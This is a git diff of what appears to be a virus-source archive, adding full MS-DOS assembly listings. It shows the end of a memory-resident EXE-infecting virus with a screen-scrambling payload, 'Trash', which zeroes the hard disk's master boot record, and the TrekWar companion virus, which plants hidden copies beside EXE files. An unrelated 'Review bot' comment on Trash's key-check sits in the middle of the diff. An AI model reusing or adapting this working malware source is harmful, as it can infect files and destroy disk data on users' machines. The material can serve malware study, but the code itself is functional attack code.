MOV AX,OFFSET ENDADR ; Length of virus + ADD AX,[DI+2] ; Add bytes in last paragraph + MOV [DI+2],AX ; Store new figure + AND [DI+2],01FFH ; Set off top bits + MOV AL,AH ; Copy high byte + XOR AH,AH ; Clear top of register + SHR AX,1 ; Divide by two + ADD [DI+4],AX ; Add to pages + MOV DX,DI ; Move address of EXE header + MOV CX,001CH ; EXE header length + MOV AH,40H ; Write handle function + INT 21H ; DOS service + CLC + RET + + ; Move segment to two-register offset + +BP0490: XOR DX,DX ; Clear register + SHL AX,1 ; \ Move double one bit + RCL DX,1 ; / + SHL AX,1 ; \ Move double one bit + RCL DX,1 ; / + SHL AX,1 ; \ Move double one bit + RCL DX,1 ; / + SHL AX,1 ; \ Move double one bit + RCL DX,1 ; / + RET + + ; Move pointer to end of file + +BP0500: XOR DX,DX ; \ No displacement + XOR CX,CX ; / + MOV AX,4202H ; Move file pointer (EOF) function + INT 21H ; DOS service + RET + + ; Get installed virus segment + +BP0510: XOR AX,AX ; \ Address zero + MOV DS,AX ; / + LDS DI,BD009C ; Load Int 27H 
vector + LDS DI,[DI+1] ; Get vector from far jump + MOV AX,DI ; Save offset + SUB DI,OFFSET BP0780-V_SIGN ; Address from jump to old Int 27H + CALL BP0530 ; Test virus signature in memory + JZ BP0520 ; Branch if found + MOV DI,AX ; Retrieve offset + SUB DI,OFFSET BP0770-V_SIGN ; Address from new Int 27H routine + CALL BP0530 ; Test virus signature in memory + JZ BP0520 ; Branch if found + LDS DI,BD0080 ; Load Int 20H vector + LDS DI,[DI+1] ; Get vector from far jump + MOV AX,DI ; Save offset + SUB DI,OFFSET BP0630-V_SIGN ; Address from jump to old Int 20H + CALL BP0530 ; Test virus signature in memory + JZ BP0520 ; Branch if found + MOV DI,AX ; Retrieve offset + SUB DI,OFFSET BP0620-V_SIGN ; Address from new Int 27H routine + CALL BP0530 ; Test virus signature in memory +BP0520: RET + + ; Test virus signature in memory + +BP0530: XOR DX,DX ; Clear register + CMP WORD PTR [DI],4756H ; Look for virus signature + JNE BP0540 ; Branch if not present + CMP BYTE PTR [DI+2],31H ; Look for rest of signature + JE BP0550 ; Branch if there +BP0540: INC DX ; Set no virus marker +BP0550: SUB DI,OFFSET V_SIGN ; Subtract offset of signature + OR DX,DX ; Test no virus marker + RET + + ; Create far jump + +BP0560: MOV AL,0EAH ; Far jump + STOSB ; Store jump instruction + MOV AX,CX ; \ Address routine + ADD AX,SI ; / + STOSW ; Store offset + MOV AX,CS ; Get segment + STOSW ; Store segment +BP0570: RET + + ; Install interrupts + +BP0580: OR DX,DX + JZ BP0570 ; Dont install if yes + PUSH DS + PUSH ES + MOV ES,SEGREG[SI] ; Get segment register + MOV DI,00ECH ; Address far jump table + CLD + MOV CX,OFFSET BP0880 ; Int 1CH routine + CALL BP0560 ; Create Int 1CH far jump + MOV CX,OFFSET BP0620 ; Int 20H routine + CALL BP0560 ; Create Int 20H far jump + MOV CX,OFFSET BP0700 ; Int 21H routine + CALL BP0560 ; Create Int 21H far jump + MOV CX,OFFSET BP0770 ; Int 27H routine + CALL BP0560 ; Create Int 27H far jump + XOR AX,AX ; \ Address zero + MOV DS,AX ; / + ASSUME DS:BOOT + CLI + MOV 
AX,00ECH ; Address Int 1CH far jump + XCHG AX,BW0070 ; Install as Int 1CH offset + MOV CS:I1C_OF[SI],AX ; Save old Int 1CH offset + MOV AX,ES ; Get this segment + XCHG AX,BW0072 ; Install as Int 1CH segment + MOV CS:I1C_SG[SI],AX ; Save old Int 1CH segment + MOV AX,00F1H ; Address Int 20H far jump + XCHG AX,BW0080 ; Install as Int 20H offset + MOV CS:I20_OF[SI],AX ; Save old Int 20H offset + MOV AX,ES ; Get this segment + XCHG AX,BW0082 ; Install as Int 20H segment + MOV CS:I20_SG[SI],AX ; Save old Int 20H segment + MOV AX,00F6H ; Address Int 21H far jump + XCHG AX,BW0084 ; Install as Int 21H offset + MOV CS:I21_OF[SI],AX ; Save old Int 21H offset + MOV AX,ES ; Get this segment + XCHG AX,BW0086 ; Install as Int 21H segment + MOV CS:I21_SG[SI],AX ; Save old Int 21H segment + MOV AX,00FBH ; Address Int 27H far jump + XCHG AX,BW009C ; Install as Int 27H offset + MOV CS:I27_OF[SI],AX ; Save old Int 27H offset + MOV AX,ES ; Get this segment + XCHG AX,BW009E ; Install as Int 27H segment + MOV CS:I27_SG[SI],AX ; Save old Int 27H segment + POP ES + POP DS + STI + RET + + ; Reset interrupts + + ASSUME DS:CODE +BP0590: PUSH ES + MOV ES,SEGREG[SI] ; Get segment register + MOV DI,00F1H ; Address far jump table (2nd entry) + CLD + MOV CX,OFFSET BP0630 ; Jump to old Int 20H + CALL BP0560 ; Create Int 20H far jump + MOV CX,OFFSET BP0720 ; Alternate Int 21H routine + CALL BP0560 ; Create Int 21H far jump + MOV CX,OFFSET BP0780 ; Jump to old Int 27H + CALL BP0560 ; Create Int 27H far jump + POP ES + RET + + ; Set Int 24H vector + +BP0600: PUSH ES + XOR AX,AX ; \ Address zero + MOV ES,AX ; / + ASSUME ES:BOOT + MOV AX,OFFSET BP0790 ; \ Interrupt 24H routine + ADD AX,SI ; / + XCHG AX,BW0090 ; Install as Int 24H offset + MOV I24_OF[SI],AX ; Save old Int 24H offset + MOV AX,CS ; Get this segment + XCHG AX,BW0092 ; Install as Int 24H segment + MOV I24_SG[SI],AX ; Save old Int 24H segment + POP ES + MOV CRTERR[SI],0 ; Clear critical error flag + RET + + ; Restore Int 24H vector + + ASSUME 
DS:NOTHING +BP0610: PUSH ES + XOR AX,AX ; \ Address zero + MOV ES,AX ; / + MOV AX,I24_OF[SI] ; Get old Int 24H offset + MOV BW0090,AX ; Restore Int 24H offset + MOV AX,I24_SG[SI] ; Get old Int 24H segment + MOV BW0092,AX ; Restore Int 24H segment + POP ES + ASSUME ES:NOTHING + RET + + ; Interrupt 20H routine + +BP0620: JMP BP0680 + + ; Interrupt 20H - jump to original routine + +BP0630: DB 0EAH ; Far jump to Int 20H +I20_OF DW 0136CH ; Original Int 20H offset +I20_SG DW 00291H ; Original Int 20H segment + + ; Get relocation constant in SI + +BP0640: POP BX ; Get return address + PUSH DS + PUSH AX + PUSH DS + PUSH CS ; \ Set DS to CS + POP DS ; / + ASSUME DS:CODE + CALL BP0650 ; \ Get current address +BP0650: POP SI ; / + SUB SI,OFFSET BP0650 ; Subtract displacement from it + JMP BX ; Branch to return address + + ; Free or allocate memory functions + +BP0660: CALL BP0640 ; Get relocation constant in SI + PUSH CX + MOV AX,[SI+7] ; Get host segment + MOV CX,ES ; Get relevant segment + CMP AX,CX ; Are they the same? + POP CX + POP DS + POP AX + JNE BP0670 ; Branch if different + PUSH CS ; \ Set ES to CS + POP ES ; / + CMP AH,49H ; Free memory? + JE BP0670 ; Branch if yes + ADD BX,01D0H ; Add length of installed segment +BP0670: POP DS + JMP BP0710 ; Pass on to old Int 21H + + ; Program termination (Int 20H, or functions 0 or 4CH) + +BP0680: XOR DX,DX ; Nothing to keep +BP0690: CALL BP0640 ; Get relocation constant in SI + PUSH ES + PUSH DX + CLI + CALL BP0590 ; Reset interrupts + STI + POP AX + MOV DX,01D0H ; Length of installed segment + ADD DX,AX ; Add length for host + ADD DX,10H ; Add PSP length (?) + POP ES + POP DS + POP AX + POP DS + MOV AH,31H ; Keep process function + JMP SHORT BP0710 ; Pass on to old Int 21H + + ; Interrupt 21H routine + +BP0700: CMP AH,4CH ; \ End process function? + JE BP0680 ; / + CMP AH,31H ; \ Keep process function? + JE BP0690 ; / + OR AH,AH ; \ Terminate program function? + JZ BP0680 ; / + CMP AH,49H ; \ Free allocated memory function? 
+ JE BP0660 ; / + CMP AH,4AH ; \ Set block function? + JE BP0660 ; / + CMP AH,4BH ; \ Load function? + JE BP0730 ; / +BP0710: DB 0EAH ; Far jump to Int 21H +I21_OF DW 0138DH ; Original Int 21H offset +I21_SG DW 00291H ; Original Int 21H segment + + ; Alternate Interrupt 21H - only intercept load + +BP0720: CMP AH,4BH ; Load function? + JNE BP0710 ; Branch if not +BP0730: PUSH CX + PUSH DX + PUSH ES + PUSH BX + PUSH SI + PUSH DI + PUSH BP + CALL BP0640 ; Get relocation constant in SI + CALL BP0600 ; Set Int 24H vector +BP0740: STI + TEST BYTE PTR SWTCHB+100H,2 ; Test switch two + JNZ BP0740 ; Branch if on + CLI + TEST BYTE PTR SWTCHB+100H,2 ; Test switch two + JNZ BP0740 ; Branch if on + OR BYTE PTR SWTCHB+100H,2 ; Set on switch two + POP DS + ASSUME DS:NOTHING + MOV BX,DX ; Pathname pointer + MOV PTHDSK[SI],0FFH ; Set drive to none + CMP BYTE PTR [BX+01],':' ; Does pathname include drive? + JNE BP0750 ; Branch if not + MOV AL,[BX] ; Get drive letter + OR AL,20H ; Convert to lowercase + SUB AL,'a' ; Convert to number + MOV PTHDSK[SI],AL ; Store drive +BP0750: PUSH SI + PUSH DI + PUSH ES + CLD + MOV SI,DX ; Pathname pointer + PUSH CS ; \ Set ES to CS + POP ES ; / + MOV DI,OFFSET DB0884+100H ; Pathname +BP0760: LODSB ; Get a character + STOSB ; Store a character + OR AL,AL ; Was that the last? 
+ JNZ BP0760 ; Branch if not + POP ES + POP DI + POP SI + CALL BP0380 ; Process file + CALL BP0610 ; Restore Int 24H vector + AND BYTE PTR CS:SWTCHB+100H,0FDH ; Set off switch two + POP AX + POP DS + POP BP + POP DI + POP SI + POP BX + POP ES + POP DX + POP CX + JMP BP0710 ; Pass on to old Int 21H + + ; Interrupt 27H routine + +BP0770: ADD DX,0FH ; Round up + MOV CL,4 ; Bits to shift + SHR DX,CL ; Convert to paragraphs + JMP BP0690 ; Keep process + + ; Interrupt 27H - jump to original routine + +BP0780: DB 0EAH ; Far jump to Int 27H +I27_OF DW 05DFEH ; Original Int 27H offset +I27_SG DW 00291H ; Original Int 27H segment + + ; Interrupt 24H routine + +BP0790: PUSH SI + CALL BP0800 ; \ Get current location +BP0800: POP SI ; / + SUB SI,OFFSET BP0800 ; Subtract offset + OR CRTERR[SI],1 ; Set critical error flag + POP SI + XOR AL,AL ; No action + IRET + +DB086E DB 1 ; Past second line indicator + DB 0 +DB0870 DB 0 ; Characters going down switch + DB 0 +SWTCHB DB 82H ; Switch byte + ; 01 - switch one - alternate timer tick + ; 02 - switch two - processing file + ; 04 - switch three - infection count target reached + ; 08 - switch four - count two started + ; 10 - switch five - don't go to start of line + ; 20 - switch six - count two started and finished (?) 
+ ; 40 - switch seven - count two finished + ; 80 - switch eight - video display permitted +I09_OF DW 0 ; Old Int 9 offset +I09_SG DW 0 ; Old Int 9 segment +DSPCNT DW 0FFDCH ; Display count +I09BSY DB 0 ; Int 9 busy switch +KEYTOK DB 0 ; Keyboard token +KEYNUM DB 0 ; Key number +VIDADR DW 0B800H ; Video RAM segment +RSTCNT DW 0 ; Restore count +FLENLO DW 39H ; File length, low word +FLENHI DW 0 ; File length, high word +DB0884 DB 'C:\3066\HELLO.COM', 0 ; Pathname + DB 'EXE', 0, 'E', 90H DUP (0) + +BP0820: PUSH CX + PUSH DS + PUSH ES + PUSH SI + PUSH DI + PUSH CS ; \ Set ES to CS + POP ES ; / + CLD + TEST AL,20H ; Test switch six + JZ BP0850 ; Branch if off + TEST AL,2 ; Test switch two + JNZ BP0860 ; Branch if on + XOR AX,AX ; \ Address zero + MOV DS,AX ; / + ASSUME DS:BOOT + MOV AL,BB0449 ; Get current VDU mode + MOV CX,0B800H ; VDU RAM address + CMP AL,7 ; Mode 7? + JNE BP0830 ; Branch if not + MOV CX,0B000H ; External mono VDU RAM + JMP SHORT BP0840 + +BP0830: CMP AL,2 ; Mode 2? + JE BP0840 ; Branch if yes + CMP AL,3 ; Mode 3? 
+ JNE BP0860 ; Branch if not +BP0840: MOV VIDADR+100H,CX ; Save video RAM segment + OR SWTCHB+100H,2 ; Set on switch two + MOV RSTCNT+100H,0 ; Set restore count to zero + MOV DS,CX ; Address video RAM + MOV CX,80*25 ; Length to copy + XOR SI,SI ; From zero + MOV DI,OFFSET SIGNAT+100H ; To end of virus + REPZ MOVSW ; Copy video + XOR AX,AX ; \ Address zero + MOV DS,AX ; / + MOV AX,OFFSET BP1010+100H ; Interrupt 9 routine + XCHG AX,BW0024 ; Install as Int 9 offset + MOV I09_OF+100H,AX ; Save old Int 9 offset + MOV AX,CS ; Get current segment + XCHG AX,BW0026 ; Install as Int 9 segment + MOV I09_SG+100H,AX ; Save old Int 9 segment +BP0850: MOV CX,0050H ; Length of one line + MOV AX,80*24*2 ; Last line address + MOV DI,OFFSET DW0005+100H ; Address line store + REPZ STOSW ; Store line numbers + AND SWTCHB+100H,7 ; Set off switches above three +BP0860: POP DI + POP SI + POP ES + POP DS + POP CX + JMP BP0990 ; Pass on to original Int 1CH + +BP0870: JMP BP0820 + + ; Interrupt 1CH routine + +BP0880: PUSH AX + MOV I09BSY+100H,0 ; Clear Int 9 busy switch + MOV AL,SWTCHB+100H ; Get switches + TEST AL,60H ; Test switches six and seven + JNZ BP0870 ; Branch if either is on + TEST AL,80H ; Test switch eight + JZ BP0910 ; Branch if off + CMP RSTCNT+100H,0 ; Is restore count off? + JE BP0890 ; Branch if yes + INC RSTCNT+100H ; Increment restore count + CMP RSTCNT+100H,0444H ; Have we reached target (1 minute)? 
+ JL BP0890 ; Branch if not + CALL BP1030 ; Video display routine + JMP BP0990 ; Pass on to original Int 1CH + +BP0890: TEST AL,18H ; Test switches four and five + JZ BP0900 ; Branch if both off + DEC DSPCNT+100H ; Decrement display count + JNZ BP0900 ; Branch if not finished + AND SWTCHB+100H,0E7H ; Set off switch three + OR SWTCHB+100H,40H ; Set on switch seven + TEST AL,8 ; Test switch four + JZ BP0900 ; Branch if off + OR SWTCHB+100H,20H ; Set on switch six +BP0900: JMP BP0990 ; Pass on to original Int 1CH + +BP0910: XOR SWTCHB+100H,1 ; Toggle switch one + TEST AL,1 ; Test previous state + JZ BP0900 ; Branch if off + PUSH BX + PUSH SI + PUSH DS + MOV DS,VIDADR+100H ; Get video RAM segment + XOR SI,SI ; Start of line + MOV DB086E+100H,0 ; Set past second line off +BP0920: MOV BX,DW0005[SI+100H] ; Get current line number + OR BX,BX ; First line? + JZ BP0930 ; Branch if yes + CMP BYTE PTR [BX+SI],' ' ; Is character a blank? + JNE BP0930 ; Branch if not + CMP BYTE PTR [BX+SI+0FF60H],' ' ; Is char on line above a space? + JE BP0930 ; Branch if yes + MOV AX,0720H ; White on black space + XCHG AX,[BX+SI+0FF60H] ; Swap with line above + MOV [BX+SI],AX ; Store new character this line + ADD BX,80*2 ; Next line +BP0930: CMP BX,80*25*2 ; Past last line? + JE BP0940 ; Branch if yes + CMP BYTE PTR [BX+SI],' ' ; Is character a blank + JNE BP0940 ; Branch if not + JNE BP0970 ; ? +BP0940: MOV BX,80*24*2 ; Address last line +BP0950: CMP BYTE PTR [BX+SI],' ' ; Is character a blank? + JNE BP0960 ; Branch if not + CMP BYTE PTR [BX+SI+0FF60H],' ' ; Is char on line above a space? + JNE BP0970 ; Branch if not +BP0960: SUB BX,80*2 ; Previous line + OR BX,BX ; First line? + JNZ BP0950 ; Branch if not +BP0970: MOV DW0005[SI+100H],BX ; Save current line number + OR WORD PTR DB086E+100H,BX ; Set past second line indicator + ADD SI,2 ; Next character position + CMP SI,80*2 ; End of line? + JNE BP0920 ; Branch if not + CMP DB086E+100H,0 ; Past second line? 
+ JNE BP0980 ; Branch if yes + OR SWTCHB+100H,80H ; Set on switch eight + MOV RSTCNT+100H,1 ; Start restore count +BP0980: POP DS + POP SI + POP BX +BP0990: POP AX + DB 0EAH ; Far jump to Int 1CH +I1C_OF DW 0FF53H ; Original Int 1CH offset +I1C_SG DW 0F000H ; Original Int 1CH segment + + ; Signal end of interrupt + +BP1000: MOV AL,20H ; \ End of interrupt + OUT 20H,AL ; / + POP AX + IRET + + ; Interrupt 9 routine + +BP1010: PUSH AX + IN AL,60H ; Get keyboard token + MOV KEYTOK+100H,AL ; Save keyboard token + IN AL,61H ; Get port B + MOV AH,AL ; Save port B + OR AL,80H ; \ Acknowledge keyboard + OUT 61H,AL ; / + MOV AL,AH ; \ Restore Port B + OUT 61H,AL ; / + CMP I09BSY+100H,0 ; Test Int 9 busy switch + MOV I09BSY+100H,1 ; Set Int 9 busy switch on + JNE BP1000 ; Branch if on already + MOV AL,KEYTOK+100H ; Get keyboard token + CMP AL,0F0H ; \ ? discard this character + JE BP1000 ; / + AND AL,7FH ; Set off top bit + CMP AL,KEYNUM+100H ; Same as last character? + MOV KEYNUM+100H,AL ; Save key number + JE BP1000 ; Branch if same as last + CMP RSTCNT+100H,0 ; Is restore count off? + JE BP1020 ; Branch if yes + MOV RSTCNT+100H,1 ; Restart restore count +BP1020: CALL BP1030 ; Video display routine + JMP BP1000 ; End of interrupt + + ; Video display routine + +BP1030: MOV DSPCNT+100H,0028H ; Set up short display count (2+ secs) + TEST SWTCHB+100H,80H ; Test switch eight + JZ BP1000 ; Branch if off + MOV DB0870+100H,1 ; Set character going down + PUSH BX + PUSH SI + PUSH DS + MOV DS,VIDADR+100H ; Get video RAM segment + TEST SWTCHB+100H,10H ; Test switch five + JNZ BP1070 ; Branch if on + OR SWTCHB+100H,10H ; Set on switch five + XOR SI,SI ; Start of line +BP1040: MOV BX,80*24*2 ; Address last line +BP1050: CMP BYTE PTR [BX+SI],' ' ; Is character a blank? 
+ JE BP1060 ; Branch if yes + SUB BX,80*2 ; Previous line + JNB BP1050 ; Branch if not + MOV BX,80*24*2 ; Address last line +BP1060: ADD BX,80*2 ; Next line + MOV DW0005[SI+100H],BX ; Save current line number + MOV FLENLO[SI+100H],BX ; Save last line number + INC SI ; \ Next character position + INC SI ; / + CMP SI,80*2 ; End of line? + JNE BP1040 ; Branch if not +BP1070: XOR SI,SI ; Start of line +BP1080: CMP DW0005[SI+100H],80*25*2 ; End of display area? + JE BP1140 ; Branch if yes + MOV BX,FLENLO[SI+100H] ; Get last line number + MOV AX,[BX+SI] ; Get current char and attributes + CMP AX,CS:SIGNAT[BX+SI+100H] ; Is it the same as the stored copy? + JNE BP1100 ; Branch if not + PUSH BX +BP1090: OR BX,BX ; First line? + JZ BP1120 ; Restore video if yes + SUB BX,80*2 ; Previous line + CMP AX,CS:SIGNAT[BX+SI+100H] ; Is this line same as current? + JNE BP1090 ; Branch if not + CMP AX,[BX+SI] ; Is this line the same + JE BP1090 ; Branch if yes + POP BX +BP1100: OR BX,BX ; First line? + JNZ BP1110 ; Character up one line if not + MOV WORD PTR [SI],0720H ; White on black space + JMP SHORT BP1130 + + ; Move character up one line + +BP1110: MOV AX,[BX+SI] ; Get current char and attributes + MOV [BX+SI+0FF60H],AX ; Move to previous line + MOV WORD PTR [BX+SI],0720H ; White on black space + SUB FLENLO[SI+100H],80*2 ; Move last line number up one + MOV DB0870+100H,0 ; Set characters going up + JMP SHORT BP1140 + + ; Restore video + +BP1120: POP BX +BP1130: MOV BX,DW0005[SI+100H] ; Get current line number + ADD BX,80*2 ; Next line + MOV DW0005[SI+100H],BX ; Save new current line number + MOV FLENLO[SI+100H],BX ; Save last line number +BP1140: INC SI ; \ Next character position + INC SI ; / + CMP SI,80*2 ; End of line? 
+ JNE BP1080 ; Branch if not + CMP DB0870+100H,0 ; Are characters going down + JE BP1150 ; Branch if not + PUSH ES + PUSH DI + PUSH CX + PUSH DS ; \ Set ES to DS + POP ES ; / + PUSH CS ; \ Set DS to CS + POP DS ; / + MOV SI,OFFSET SIGNAT+100H ; From end of virus + XOR DI,DI ; To zero + MOV CX,80*25 ; Length to copy + REPZ MOVSW ; Restore video + MOV DSPCNT+100H,0FFDCH ; Restart display count (60 mins) + AND SWTCHB+100H,4 ; Set off all switches but three + OR SWTCHB+100H,88H ; Set on switches four and eight + MOV RSTCNT+100H,0 ; Set restore count off + XOR AX,AX ; \ Address zero + MOV DS,AX ; / + ASSUME DS:BOOT + MOV AX,I09_OF+100H ; Get old Int 9 offset + MOV BW0024,AX ; Re-install Int 9 offset + MOV AX,I09_SG+100H ; Get old Int 9 segment + MOV BW0026,AX ; Re-install Int 9 segment + POP CX + POP DI + POP ES +BP1150: POP DS + POP SI + POP BX + RET + + ; Copy virus and transfer control + +BP1160: CLD + POP AX ; Recover return address + SUB AX,SI ; Subtract source offset + ADD AX,DI ; Add target offset + PUSH ES ; Push new segment + PUSH AX ; Push new return address + REPZ MOVSB ; Copy virus + RETF ; Return to copy + + DB 090H +SIGNAT DW 0E850H + DB 0E2H, 003H, 08BH + +ENDADR EQU $ + +CODE ENDS + + END + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; + diff --git a/MSDOS/Virus.MSDOS.Unknown.trash.asm b/MSDOS/Virus.MSDOS.Unknown.trash.asm new file mode 100644 index 00000000..b979f1a9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.trash.asm 
@@ -0,0 +1,169 @@
+ page ,132
+ title Trash - smashes the boot record on the first hard disk
+ name TRASH
+
+ .radix 16
+
+code segment
+ assume cs:code,ds:code
+
+ org 100
+
+CODEX equ 0C000 ; Or use 0300 when tracing DOS
+
+CR equ 0Dh
+LF equ 0A
+
+start:
+ jmp do_it
+
+oldint1 dd ?
+newintx dd ?
+oldintx dd ?
+trace db 1
+found db 0
+buffer db 200 dup (0)
+message db CR,LF,'********** W A R N I N G ! ! ! **********',CR,LF,CR,LF
+ db 'This program, when run, will zero (DESTROY!) the',CR,LF
+ db 'master boot record of your first hard disk.',CR,LF,CR,LF
+ db 'The purpose of this is to test the antivirus software,',CR,LF
+ db 'so be sure you have installed your favourite',CR,LF
+ db 'protecting program before running this one!',CR,LF
+ db "(It's almost sure it will fail to protect you anyway!)",CR,LF
+ db CR,LF,'Press any key to abort, or',CR,LF
+ db 'press Ctrl-Alt-RightShift-F5 to proceed (at your own risk!) $'
+warned db CR,LF,CR,LF,'Allright, you were warned!',CR,LF,'$'
+
+do_it:
+ mov ax,600 ; Clear the screen by scrolling it up
+ mov bh,7
+ mov dx,1950
+ xor cx,cx
+ int 10
+
+ mov ah,0F ; Get the current video mode
+ int 10 ; (the video page, more exactly)
+
+ mov ah,2 ; Home the cursor
+ xor dx,dx
+ int 10
+
+ mov ah,9 ; Print a warning message
+ mov dx,offset message
+ int 21
+
+ mov ax,0C08 ; Flush the keyboard and get a char
+ int 21
+ cmp al,0 ; Extendet ASCII?
+ jne quit1 ; Exit if not
+ mov ah,8 ; Get the key code
+ int 21
+ cmp al,6C ; Shift-F5?
+ jne quit1 ; Exit if not
+ mov ah,2 ; Get keyboard shift status
+ int 16
+ and al,1101b ; Ctrl-Alt-RightShift?
+ jnz proceed ; Proceed if so
+quit1:
+ jmp quit ; Otherwise exit
+
+proceed:
+ mov ah,9 ; Print the last message
+ mov dx,offset warned
+ int 21
+
+ mov ax,3501 ; Get interrupt vector 1 (single steping)
+ int 21
+ mov word ptr oldint1,bx
+ mov word ptr oldint1+2,es
+
+ mov ax,2501 ; Set new INT 1 handler
+ mov dx,offset newint1
+ int 21
+
+ mov ax,3513 ; Get interrupt vector 13
+ int 21
+ mov word ptr oldintx,bx
+ mov word ptr oldintx+2,es
+ mov word ptr newintx,bx
+ mov word ptr newintx+2,es
+
+; The following code is sacred in it's present form.
+; To change it would cause volcanos to errupt,
+; the ground to shake, and program not to run!
+
+ mov ax,200
+ push ax
+ push cs
+ mov ax,offset done
+ push ax
+ mov ax,100
+ push ax
+ push cs
+ mov ax,offset faddr
+ push ax
+ mov ah,55
+ iret
+
+ assume ds:nothing
+
+faddr:
+ jmp oldintx
+
+newint1:
+ push bp
+ mov bp,sp
+ cmp trace,0
+ jne search
+exit:
+ and [bp+6],not 100
+exit1:
+ pop bp
+ iret
+search:
+ cmp [bp+4],CODEX
+ jb exit1
+;Or use ja if you want to trace DOS-owned interrupt
+ push ax
+ mov ax,[bp+4]
+ mov word ptr newintx+2,ax
+ mov ax,[bp+2]
+ mov word ptr newintx,ax
+ pop ax
+ mov found,1
+ mov trace,0
+ jmp exit
+
+ assume ds:code
+done:
+ mov trace,0
+ push ds
+ mov ax,word ptr oldint1+2
+ mov dx,word ptr oldint1
+ mov ds,ax
+ mov ax,2501 ; Restore old INT 1 handler
+ int 21
+ pop ds
+
+; Code beyong this point is not sacred...
+; It may be perverted in any manner by any pervert.
+
+ cmp found,1 ; See if original INT 13 handler found
+ jne quit ; Exit if not
+ push ds
+ pop es ; Restore ES
+
+ mov ax,301 ; Write 1 sector
+ mov cx,1 ; Cylinder 0, sector 1
+ mov dx,80 ; Head 0, drive 80h
+ mov bx,offset buffer
+ pushf ; Simulate INT 13
+ call newintx ; Do it
+
+quit:
+ mov ax,4C00 ; Exit program
+ int 21
+
+code ends
+ end start
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.trekwar.asm b/MSDOS/Virus.MSDOS.Unknown.trekwar.asm
new file mode 100644
index 00000000..1fa30b00
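Review bot: The modifier check that gates the sector write, `and al,1101b` followed by `jnz proceed`, passes when any one of the masked shift-status bits is set, not only the full Ctrl-Alt-RightShift chord the warning text promises, so the interlock against an accidental run is weaker than the prompt documents. With `.radix 16` in effect the trailing `b` is itself a hex digit, so that literal may not even assemble to the mask the comment implies; worth confirming against the assembler this was written for. At minimum the comment should describe the real behaviour, e.g. `and al,1101b ; jnz fires on any one of Ctrl/Alt/RightShift, not the full chord`.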
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.trekwar.asm
@@ -0,0 +1,185 @@
+;TREKWAR virus - we were overjoyed at Crypt Newsletter when Goose showed
+;us his update of CloneWar, TrekWar. Alert readers will remember ACME,
+;the musical companion based on ZENO, a relative of CloneWar.
+;So here it is!
+;TrekWar
+;Ŀ
+; Assembly Source Listing for TrekWar Companion Virus
+; Copyright (c) 1993 T.R.E.K. All Rights Reserved. :)
+;Ĵ
+; The TrekWar is a simple modification of the Clonewar V2 companion virus;
+; for all you trekkers out there... For those of you who, heaven forbid, do
+; not know what the words below mean, they are the words to the old series
+; opening music of Star Trek...
+;
+
+CSEG SEGMENT
+ ASSUME CS:CSEG,DS:NOTHING
+
+ ORG 100H
+
+START:
+ jmp VIR_BEGIN ;lets get moving...
+
+ db "",13,10
+ db "",13,10
+ db "Beyond",13,10 ;blah blah blah
+ db "The rim of the star-light",13,10
+ db "My love",13,10
+ db "Is wand'ring in star-flight",13,10
+ db "I know",13,10
+ db "He'll find in star-clustered reaches",13,10
+ db "Love",13,10
+ db "Strange love a star woman teaches.",13,10
+ db "I know",13,10
+ db "His journey ends never",13,10
+ db "His star trek",13,10
+ db "Will go on forever.",13,10
+ db "But tell him",13,10
+ db "While he wanders his starry sea",13,10
+ db "Remember, remember me."
+ db "",13,10
+ db "",13,10
+
+ db "[TrekWar] " ;what the heck, its only a few bytes!?
+WILDCARD DB "*.EXE",0
+FILE_EXT DB "COM",0
+FILE_FOUND DB 12 DUP(' '), 0
+FILE_CREATE DB 12 DUP(' '), 0
+SEARCH_ATTRIB DW 17H
+NUM_INFECT DW 0
+
+
+My_Cmd:
+CMD_LEN DB 13
+FILE_CLONE DB 12 DUP (' '), 0
+
+;
+; Read all the directory filenames and store as records in buffer.
+;
+
+Vir_begin:
+
+ mov sp,offset STACK_HERE ;move stack down
+ mov bx,sp
+ add bx,15
+ mov cl,4
+ shr bx,cl
+ mov ah,4ah ;deallocate rest of memory
+ int 21h
+
+ mov di,OFFSET FILE_CLONE ;Point to buffer.
+ mov si,OFFSET FILE_FOUND
+ mov cx,12
+ rep movsb
+
+Read_dir: mov dx,OFFSET WILDCARD ;file mask for directory search
+ mov cx,SEARCH_ATTRIB
+
+ mov ah,4Eh ;find first matching file
+ int 21h
+
+ jc EXIT ;If empty directory, exit
+
+;
+
+Store_name:
+
+ mov di,OFFSET FILE_FOUND ;Point to buffer.
+ mov si,158 ;stow the file found in buffer
+ mov cx,12
+ rep movsb
+
+ mov di,OFFSET FILE_CREATE ;Point to buffer.
+ mov si,158
+ mov cx,12
+ rep movsb
+
+ cld
+ mov di,OFFSET FILE_CREATE
+ mov al,'.'
+ mov cx,9
+ repne scasb ;find the '.'
+
+ mov si,OFFSET FILE_EXT
+ mov cx,3
+ rep movsb ;replace the .EXE with .COM
+ ;from buffer
+
+;
+
+Check_file: ;does the file exist?
+ mov dx,OFFSET FILE_CREATE
+ xor cx,cx
+ mov ax,3d00h ;Open file, read only
+ int 21h
+ jnc find_next
+
+;
+Infect_file: ;create companion routine
+
+ mov dx,OFFSET FILE_CREATE ;contains name of "companion"
+ xor cx,cx
+ mov ah,3ch ;construct file
+ int 21h
+ jc EXIT
+
+ ;Write virus to companion file
+ xchg bx,ax
+ mov cx,(OFFSET END_OF_CODE - OFFSET START) ;virus length
+ mov dx,OFFSET START
+ mov ah,40h ;write to file function
+ int 21h ;do it
+
+ ;Close file
+ mov ah,3eh ;assumes bx still has file handle
+ int 21h
+
+ ;Change attributes
+ mov dx,OFFSET FILE_CREATE ;of created file to
+ mov cx,3 ;(1) read only and (2) hidden
+ mov ax,4301h
+ int 21h
+ jmp prepare_command
+
+;
+;...findnext...
+;
+find_next:
+ mov ah, 4fh ;find next...
+ int 21h
+ jmp store_name
+;
+Prepare_command:
+
+ cld
+ mov di,OFFSET FILE_CLONE
+ mov al,0
+ mov cx,12
+ repne scasb ;find the end of string \0
+
+ mov al,0Dh ;
+ stosb ;replace \0 with a
+
+ mov ax,12 ;store length of the command
+ sub ax,cx
+ mov CMD_LEN, al
+
+;
+
+Exit:
+ ;Run the original program
+ mov si, OFFSET MY_CMD
+ int 2Eh ;Pass command to command
+ ;interpreter for execution
+ mov ax,4C00H ;Exit to DOS
+ int 21h
+
+
+END_OF_CODE = $
+
+STACK_HERE EQU END_OF_CODE + 512
+
